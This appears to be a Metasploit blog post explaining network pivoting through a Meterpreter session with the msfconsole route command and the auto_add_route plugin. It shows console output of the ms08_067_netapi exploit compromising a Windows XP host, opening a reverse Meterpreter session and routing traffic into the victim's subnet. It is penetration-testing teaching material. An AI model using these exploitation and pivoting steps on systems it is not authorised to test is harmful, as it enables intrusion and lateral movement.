Among the coolest features in metasploit is the ability to tunnel through a meterpreter session to the network on the other side. The route command in msfconsole sets this up but requires a bit of experience to get right.
[*] Meterpreter session 1 opened (10.1.1.52:4444 -> 10.1.1.118:1238) meterpreter > run get_local_subnets Local subnet: 10.1.1.0/255.255.255.0meterpreter > background msf exploit(ms08_067_netapi) > route add 10.1.1.0 255.255.255.0 1msf exploit(ms08_067_netapi) > route print Active Routing Table==================== Subnet Netmask Gateway ------ ------- ------- 10.1.1.0 255.255.255.0 Session 1 msf exploit(ms08_067_netapi) >
After running the above commands any traffic sent to the 10.1.1.0 network will be tunnelled through the session. There also is a plugin that automatically adds a route for any previously-unseen subnets when a new session opens up. Here is some example usage and output:
msf exploit(ms08_067_netapi) > load auto_add_route [*] Successfully loaded plugin: auto_add_routemsf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 10.1.1.52:4444 [*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 3 - lang:English[*] Selected Target: Windows XP SP3 English (NX)[*] Triggering the vulnerability...[*] Sending stage (725504 bytes)[*] Meterpreter session 1 opened (10.1.1.52:4444 -> 10.1.1.118:1239)[*] AutoAddRoute: Routing new subnet 10.1.1.0/255.255.255.0 through session 1 meterpreter > background msf exploit(ms08_067_netapi) > route print Active Routing Table==================== Subnet Netmask Gateway ------ ------- ------- 10.1.1.0 255.255.255.0 Session 1 msf exploit(ms08_067_netapi) >
The auto_add_route plugin is now available in the metasploit trunk; ‘svn up’ to get it.
Source: Metasploit Blog
